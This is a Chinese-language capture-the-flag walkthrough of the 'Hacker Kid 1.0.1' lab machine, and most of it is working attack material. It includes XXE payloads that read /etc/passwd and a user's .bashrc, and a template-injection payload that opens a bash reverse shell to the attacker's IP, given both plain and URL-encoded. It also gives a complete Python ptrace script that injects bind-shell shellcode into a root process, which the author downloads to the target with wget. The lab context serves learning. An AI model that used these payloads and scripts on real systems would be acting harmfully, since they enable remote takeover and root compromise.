实战演练"/>
HACKER KID: 1.0.1实战演练
文章目录
- HACKER KID: 1.0.1实战演练
- 一、前期准备
- 1、相关信息
- 二、信息收集
- 1、端口扫描
- 2、访问网站
- 3、扫描目录
- 4、查看源码
- 5、请求参数
- 6、burpsuite批量请求
- 7、编辑hosts文件
- 8、DNS区域传输
- 9、编辑hosts
- 10、访问网站
- 11、注册账号
- 12、burpsuite抓包
- 13、XML注入
- 14、解密
- 15、登录网站的9999端口
- 16、提交参数
- 17、监听
- 三、提权
- 1、查找具有Capabilities特殊操作权限的程序
- 2、创建源码文件
- 3、开机本地开启http服务
- 4、下载脚本
- 5、查看以root运行的进程
- 6、执行脚本
- 7、查看端口是否开放
- 8、连接端口
HACKER KID: 1.0.1实战演练
一、前期准备
1、相关信息
靶机网站:,719/
| 设备名称 | IP地址 |
|---|---|
| 攻击机:kali | 192.168.0.109 |
| 靶机:Hacker kid: 1.0.1 | 192.168.0.103 |
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.0.103
//开放DNS:53端口、WEB:80端口、9999端口
//DNS:53端口版本号ISC BIND 9.16.1
//WEB:80端口中间件为Apache-httpd 2.4.41
//MySQL:3306端口版本号为Tornado httpd 6.1
2、访问网站
http://192.168.0.103/
翻译为:
你给我起了一个“臭名昭著的黑客”的名字!!就因为我黑了你的整个服务器。
现在我可以访问你的整个服务器了。如果你足够聪明,可以取回它,就给我看看。
“你越挖我,你就会在你的服务器上找到我。挖我…挖我更多”
http://192.168.0.103/index.html
//无法访问,返回404
http://192.168.0.103/#app.html
//发现出现一个#符号,页面没有变化
http://192.168.0.103/app.html
//功能没法使用
http://192.168.0.103/#form.html
//发现出现一个#符号,页面没有变化
http://192.168.0.103/form.html
3、扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.0.103
4、查看源码
view-source:http://192.168.0.103/index.php
//使用GET提交page_no请求新的页面
5、请求参数
http://192.168.0.103/index.php?page_no=1
//有回显,批量测试
6、burpsuite批量请求
//原文为:
Okay so you want me to speak something ?
I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!
Out of my many homes...one such home..one such home for me : hackers.blackhat.local
//翻译为:
好吧,你想让我说点什么?
我是一个黑客孩子,而不是一个愚蠢的黑客。所以我创建了一些子域,以便随时返回服务器!!
在我的许多家里。。。一个这样的家。。对我来说就是这样一个家:hackers.blackhat.local
7、编辑hosts文件
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts
//添加192.168.0.103 hackers.blackhat.local
8、DNS区域传输
┌──(kali㉿kali)-[~]
└─$ dig axfr @192.168.0.103 blackhat.local
9、编辑hosts
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/hosts
10、访问网站
/
//发现一个注册界面
11、注册账号
//提示邮箱错误
12、burpsuite抓包
//发现是XML传输数据的
13、XML注入
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bashrc" >]>
<root><name>kali</name><tel>13911111111</tel><email>&xxe;</email><password>123456</password>
</root>
14、解密
//账号:admin
//密码:Saket!#$%@!!
15、登录网站的9999端口
http://192.168.0.103:9999/login?next=%2F
//账号:saket,密码:Saket!#$%@!!
//原文为:
Tell me your name buddy
How can i get to know who are you ??
//翻译为:
告诉我你的名字,伙计
我怎么才能知道你是谁??
16、提交参数
//编码前:
{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.0.109/4444 0>&1"')}}
//编码后:
%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.109%2F4444%200%3E%261%22')%7D%7D
17、监听
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
三、提权
1、查找具有Capabilities特殊操作权限的程序
saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null
2、创建源码文件
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: .c import ctypes
import sys
import struct# Macros defined in <sys/ptrace.h>
# .h.htmlPTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17# Structure defined in <sys/user.h>
# .h.html#user_regs_structclass user_regs_struct(ctypes.Structure):_fields_ = [("r15", ctypes.c_ulonglong),("r14", ctypes.c_ulonglong),("r13", ctypes.c_ulonglong),("r12", ctypes.c_ulonglong),("rbp", ctypes.c_ulonglong),("rbx", ctypes.c_ulonglong),("r11", ctypes.c_ulonglong),("r10", ctypes.c_ulonglong),("r9", ctypes.c_ulonglong),("r8", ctypes.c_ulonglong),("rax", ctypes.c_ulonglong),("rcx", ctypes.c_ulonglong),("rdx", ctypes.c_ulonglong),("rsi", ctypes.c_ulonglong),("rdi", ctypes.c_ulonglong),("orig_rax", ctypes.c_ulonglong),("rip", ctypes.c_ulonglong),("cs", ctypes.c_ulonglong),("eflags", ctypes.c_ulonglong),("rsp", ctypes.c_ulonglong),("ss", ctypes.c_ulonglong),("fs_base", ctypes.c_ulonglong),("gs_base", ctypes.c_ulonglong),("ds", ctypes.c_ulonglong),("es", ctypes.c_ulonglong),("fs", ctypes.c_ulonglong),("gs", ctypes.c_ulonglong),]libc = ctypes.CDLL("libc.so.6")pid=int(sys.argv[1])# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))print("Instruction Pointer: " + hex(registers.rip))print("Injecting Shellcode at: " + hex(registers.rip))# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):# Convert the byte to little endian.shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')shellcode_byte=int(shellcode_byte_little_endian,16)# Inject the byte.libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)print("Shellcode Injected!!")# Modify the instuction pointer
registers.rip=registers.rip+2# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))print("Final Instruction Pointer: " + hex(registers.rip))# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
3、开机本地开启http服务
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8080
4、下载脚本
saket@ubuntu:~$ wget http://192.168.0.109:8080/inject.py
5、查看以root运行的进程
saket@ubuntu:~$ ps -aef | grep root
6、执行脚本
saket@ubuntu:~$ python2.7 inject.py 670
7、查看端口是否开放
saket@ubuntu:~$ netstat -ano | grep 5600
//如果端口没打开,可以重新选择进程号
8、连接端口
┌──(kali㉿kali)-[~]
└─$ nc 192.168.0.103 5600
更多推荐
HACKER KID: 1.0.1实战演练
发布评论